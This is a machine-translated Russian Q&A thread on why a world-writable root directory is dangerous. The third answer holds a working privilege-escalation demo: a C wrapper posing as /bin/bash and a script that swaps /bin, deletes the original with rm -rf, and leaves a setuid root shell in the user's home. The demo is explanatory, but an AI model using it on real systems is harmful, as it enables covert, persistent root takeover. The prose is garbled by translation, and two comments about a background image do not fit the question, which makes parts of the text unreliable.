Должен ли рут / иметь 777 разрешение?

Хотя большая часть содержимого составляет 755.

Это проблема?

3
задан 24 April 2016 в 08:45

3 ответа

Это интересно что / на самом деле позволяет 777 полномочия, которые будут установлены на нем. / папка не должна иметь 777 полномочия, поскольку это означает, что любой пользователь вошел в систему, могут создать файлы и папки в / корневой уровень. Я протестировал это в VM, и Вы не МОЖЕТЕ удалить ни одну из папок или файлов, которые не являются 777 без того, чтобы быть sudo, root или owner. Права доступа все еще сопровождаются, как попытка получить доступ /root сама папка дала бы Вам отклоненное разрешение. Однако это сказанное, Вы могли все еще переместиться /root папка к /root.old создание небольшого опустошения.

Для фиксации этого, можно работать sudo chmod 755 / изменить полномочия на то, каковы они должны быть. Можно также работать sudo chown root:root / только, чтобы удостовериться, что это принадлежит самому корню. НЕ выполняйте ни одну из тех команд с-R, поскольку это изменит все файлы и папки в разделе для соответствия полномочиям и владению.

Надеюсь, это поможет!

12
ответ дан 24 April 2016 в 18:45

Нет. Для / (корневой каталог) не безопасно иметь 777 полномочия. Это означает rwxrwxrwx, т.е. у каждого пользователя есть разрешение записи к корневому каталогу.

С тем разрешением, каждый пользователь сможет создать новые подкаталоги, удалить существующие подкаталоги и заменить существующие подкаталоги. Например, злонамеренный пользователь мог удалить /bin (путем переименования его к /bin.old) и создать новое /bin принадлежавший им, содержа злонамеренные исполняемые файлы. Или пользователь мог удалить /etc (путем переименования его к /etc.old) и создать новое /etc содержащий новое /etc/passwd и /etc/shadow файл, который позволяет пользователю войти в каждый аккаунт в системе.

8
ответ дан 24 April 2016 в 18:45
  • 1
    Это дало мне хихиканье, я должен признать. Pranked Вашим собственным фоновым изображением! – Organic Marble 30 September 2017 в 06:29

/ не должно быть мировым записываемым

/ быть мировым записываемым может быть огромной проблемой. Наличие полномочий записи на /, любой пользователь может переместиться/переименовать любой файл или каталог в /. Это означает, что любой пользователь может заменить /etc, /usr или любой из других каталогов в / с каталогами их выбора.

Отказ в обслуживании: тривиальный

Любой пользователь может тривиально DoS Ваша система путем переименования /etc и /usr.

Расширение полномочий: Немного менее тривиальный

Немного более трудно выполнить расширение полномочий. Пользователь может заменить /bin с их собственной копией и любым процессом, который затем пытается использовать cp, или даже запустите оболочку, сразу будет в их милосердии. Весь пользователь должен сделать, ожидание процесса, работающего как корень для использования любой команды в /bin, или пользователь root для использования входа в систему, и они находятся в.

Пример

bash.c:

#include<sys/types.h>
#include<unistd.h>

int main(int argc, char*argv[], char *env[])
{
    if (getuid() == 0) {
        system("/home/muru/foo");
    }
    execve("/bin/bash", argv, env); 
}

foo:

#!/bin/sh

mv /bin /..bin
mv /.bin /bin
rm -rf /..bin
cp /bin/bash /home/muru
chown root:root /home/muru/bash
chmod u+s /home/muru/bash

И затем:

$ gcc -o bash bash.c
$ mkdir /..bin
$ cd /bin; for i in /bin/*; do ln -s /..bin/"$i" /.bin/"$i"; done
$ mv /bin /.bin
$ mv /..bin /bin
$ cp bash /bin

И в следующий раз базируются, запускает оболочку, Вы получаете setuid исполняемый файл в своем корневом каталоге, который можно затем удобно использовать для получения корня каждый раз, когда Вы чувствуете себя подобно ему, не оставляя много трассировки.

8
ответ дан 24 April 2016 в 18:45
  • 1
    Спасибо за сообщение. Это - полезная информация так Upvote. - также вычисленный, что было неправильным с этой системой - само фоновое изображение содержало те значки. Никакая идея, как/почему. Но просто изменение фонового изображения от Xfce (Приложения, Настройки, Рабочий стол) заставило их уйти.. – SDsolar 16 September 2017 в 03:52

Другие вопросы по тегам:

Похожие вопросы: